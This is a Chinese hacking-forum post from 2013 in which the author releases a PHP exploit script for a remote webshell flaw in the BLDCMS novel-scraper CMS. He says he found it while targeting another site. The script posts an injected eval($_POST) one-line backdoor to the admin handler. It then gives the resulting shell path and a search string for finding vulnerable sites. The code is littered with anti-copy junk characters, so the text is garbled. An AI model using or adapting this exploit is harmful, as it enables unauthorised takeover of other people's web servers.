之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
u9 ?5 r V2 O* d/ S6 z* ^& U$ I) N- M3 z/ K
. w2 n# F+ K( I. h1 P话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
" @+ T* S+ V- ~+ ]2 Y r, P3 y ^" @ # A, b) `/ L" y$ b
既然都有人发了 我就把我之前写好的EXP放出来吧
9 g& S5 j' D+ j8 `1 m2 X! C
. u& G; W! j7 Y5 A) h: Iview source print?01.php;">' h. S$ l& p# _9 D
02.<!--?php
% \% J# C# o/ S4 r3 z7 v# a03.echo "-------------------------------------------------------------------! J% y& S8 \# N$ u' N
04. - e$ H# g/ H9 Y5 _; ]0 V
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP/ n# }! w# L+ M0 w% [# [
06. 3 [9 k$ h0 P P+ S: T
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun1 Q) `8 g- j: h2 s
08.
2 o+ @0 s5 {" S09.QQ:981009941\r\n 2013.3.21\r\n ' b. _6 g3 a- u0 @0 c
10. 8 x9 _& l$ Q4 I8 W% K
11.
/ n% i+ q, u% [12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码9 M% q3 F" Z& `2 k6 E6 {+ J
13. ' y m4 }3 P x9 d7 N) _" c! ~
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
4 D+ p/ |, M) V$ l" ~15.
. A* D) `3 |4 s) C0 V3 I$ B) r16.--------------------------------------------------------------------\r\n";
A+ o' g3 V, d) L9 O; @17.$url=$argv[1];
. z! T2 h, I: {( d18.$dir=$argv[2];
* D. f |% P. a19.$pass=$argv[3];
: T8 _7 a5 N% G) k2 [/ T! h- o20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';3 b! Q, p; w+ x7 a h
21.if (emptyempty($pass)||emptyempty($url))
( U5 R( W" n3 Z' M22.{exit("请输入参数");}$ `1 U7 t# U5 m l$ G3 A! E9 j
23.else
. J! z2 D$ r/ E" g24.{
+ g* O F, n" q/ V8 {$ q h25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev- n n" c x. ^( q
26.
+ O$ k3 `; O2 D& u+ q+ {0 s27.al;- k7 {3 m# ]4 T; J1 O! U
28.$length = strlen($fuckdata);
3 J! [! C& H" ]+ p6 y8 x* [29.function getshell($url,$pass)
, | Z& q! H E. x5 a8 j0 [30.{$ _5 B, L3 b0 g
31.global $url,$dir,$pass,$eval,$length,$fuckdata;, \5 R2 o4 D( O' S
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
7 T7 H4 i9 W3 Q8 I- }0 Z33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";, `2 ~+ w* _( z3 r) Q
34.$header .= "User-Agent: MSIE\r\n"; p/ O% t3 Z8 K; j
35.$header .= "Host:".$url."\r\n";
- j( X' n, k6 m36.$header .= "Content-Length: ".$length."\r\n";# I4 X5 n+ M# t
37.$header .= "Connection: Close\r\n";+ \" Y% Y5 [+ o9 h6 {% i& Z" ^6 s% b
38.$header .="\r\n";
& c( W" L0 b; ? i" a% }39.$header .= $fuckdata."\r\n\r\n";
4 A1 x: t* J& }: m: g40.$fp = fsockopen($url, 80,$errno,$errstr,15);$ p: w7 o* A+ H$ a" f( K
41.if (!$fp)
" j/ {6 {# x( b" Z( }( \$ @42.{
( a" U ?& B' u E/ g8 F43.exit ("利用失败:请检查指定目标是否能正常打开");# f. M* ?7 @% c, f$ V
44.}
0 P3 B/ d3 E6 \, y' [$ p45.else{ if (!fputs($fp,$header))4 t( F; N& H! M N E7 n, c
46.{exit ("利用失败");}
# C' d- u$ f: }+ h U47.else
- {; k r3 U1 N. d R# ]48.{" G" K1 N& f( a3 Q1 `
49.$receive = '';
@5 B7 v' H8 v% n; J) d) G5 S50.while (!feof($fp)) {
& Z2 b) r- \- d51.$receive .= @fgets($fp, 1000);
7 G) n/ S+ r3 Q; v5 a52.}
/ O+ C6 t J, S% A, i53.@fclose($fp);6 B' g( G1 W5 e6 \1 Y3 x9 D
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标! {9 B% ~2 [* E1 K8 K) k1 A' P
55. R* B G8 T' T$ e/ Y/ o
56.GPC是否=off)";8 H( Z, s1 L E8 o
57.}}* f6 Z% b0 w) E& B( X' u/ F
58.}
! P- C8 ~2 e/ {59.}' B3 y3 o% p9 i# g7 k9 s1 p
60.getshell($url,$pass);) h* ?1 a1 _9 o- @: w8 g
61.?-->0 S1 n. i! v; h; D$ w9 Z
+ t# _4 c2 z6 ~
$ B# c5 g; q! V! m3 I0 o
& P" y5 @% s, a$ D% A i: u9 pby 数据流: {' x, v6 q- N" \/ ^. h) @9 E- E
|
发表于 2013-3-26 20:49:10
收藏
支持
反对